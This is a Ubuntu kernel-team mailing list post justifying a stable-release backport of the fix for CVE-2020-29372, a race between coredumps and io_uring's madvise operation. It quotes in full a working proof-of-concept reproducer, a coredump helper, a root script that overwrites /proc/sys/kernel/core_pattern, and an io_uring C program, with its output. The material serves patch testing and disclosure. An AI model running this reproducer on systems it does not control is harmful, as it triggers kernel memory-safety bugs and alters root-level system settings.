[SRU][CVE-2020-29372][F/B/X][PATCH 0/1] mm: check that mm is still valid in madvise()

William Breathitt Gray william.gray at canonical.com
Fri Jan 8 08:41:24 UTC 2021


SRU Justification
=================

[Impact]

An issue was discovered in do_madvise in mm/madvise.c in the Linux
kernel before 5.6.8. There is a race condition between coredump
operations and the IORING_OP_MADVISE implementation, aka
CID-bc0c4d1e176e.

[Testing]

Jann Horn from Google Security Research has provided a root-only KASAN
reproducer:
<https://packetstormsecurity.com/files/157622/Linux-5.6-IORING_OP_MADVISE-Race-Condition.html>.
You should also be able to hit the bug as a normal user, especially if
you use FUSE:

$ cat > coredump_helper.c
#include <unistd.h>
#include <stdlib.h>
#include <err.h>
#include <stdbool.h>

int main(void) {
  char buf[1024];
  size_t total = 0;
  bool slept = false;
  while (1) {
    int res = read(0, buf, sizeof(buf));
    if (res == -1) err(1, \"read\");
    if (res == 0) return 0;
    total += res;
    if (total > 1024*1024 && !slept) {
      sleep(2);
      slept = true;
    }
  }
}
$ gcc -o coredump_helper coredump_helper.c
$ cat > set_helper.sh 
#!/bin/sh
echo \"|$(realpath ./coredump_helper)\" > /proc/sys/kernel/core_pattern
$ sudo ./set_helper.sh 
$ cat > dumpme.c
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/syscall.h>
#include <err.h>
#include <unistd.h>
#include <sys/mman.h>
#include <linux/io_uring.h>

#define SYSCHK(x) ({          \\
  typeof(x) __res = (x);      \\
  if (__res == (typeof(x))-1) \\
    err(1, \"SYSCHK(\" #x \")\"); \\
  __res;                      \\
})


int main(void) {
  void *area = SYSCHK(mmap(NULL, 1024*1024*2, PROT_READ|PROT_WRITE|PROT_EXEC,
                           MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
  memset(area, 'O', 1024*1024*2);
  SYSCHK(madvise(area+0x1000, 256*0x1000, MADV_RANDOM));

  // initialize uring
  struct io_uring_params params = { };
  int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/10, &params));
  unsigned char *sq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
                                       MAP_SHARED, uring_fd,
                                       IORING_OFF_SQ_RING));
  unsigned char *cq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
                                       MAP_SHARED, uring_fd,
                                       IORING_OFF_CQ_RING));
  struct io_uring_sqe *sqes = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
                                          MAP_SHARED, uring_fd,
                                          IORING_OFF_SQES));

  // prepare delayed madvise via uring
  struct timespec ts = { .tv_sec = 1 };
  sqes[0] = (struct io_uring_sqe) {
    .opcode = IORING_OP_TIMEOUT,
    .flags = IOSQE_IO_HARDLINK,
    .len = 1,
    .addr = (unsigned long)&ts
  };
  sqes[1] = (struct io_uring_sqe) {
    // no ioprio, buf_index, off
    .opcode = IORING_OP_MADVISE,
    .addr = (unsigned long)area+1024*4/**1024*/,
    .len = 1024*1024,
    .fadvise_advice = MADV_NORMAL
  };
  ((int*)(sq_ring + params.sq_off.array))[0] = 0;
  ((int*)(sq_ring + params.sq_off.array))[1] = 1;
  (*(int*)(sq_ring + params.sq_off.tail)) += 2;

  int submitted = SYSCHK(syscall(__NR_io_uring_enter, uring_fd,
                                 /*to_submit=*/2, /*min_complete=*/0,
                                 /*flags=*/0, /*sig=*/NULL, /*sigsz=*/0));
  printf(\"submitted %d\
\", submitted);

  *(volatile char *)0 = 42;
}
$ gcc -o dumpme dumpme.c
$ ./dumpme 
submitted 2
Segmentation fault (core dumped)
$ 

[Regression Potential]

Regression potentional is low. Changes affect only the do_madvise()
function, and consist of a simple mitigation: verifying that the mm is
still okay via mmget_still_valid().

[Miscellaneous]

Fix is already present in Groovy and Hirsute.

Linus Torvalds (1):
  mm: check that mm is still valid in madvise()

 mm/madvise.c | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)

-- 
2.27.0




More information about the kernel-team mailing list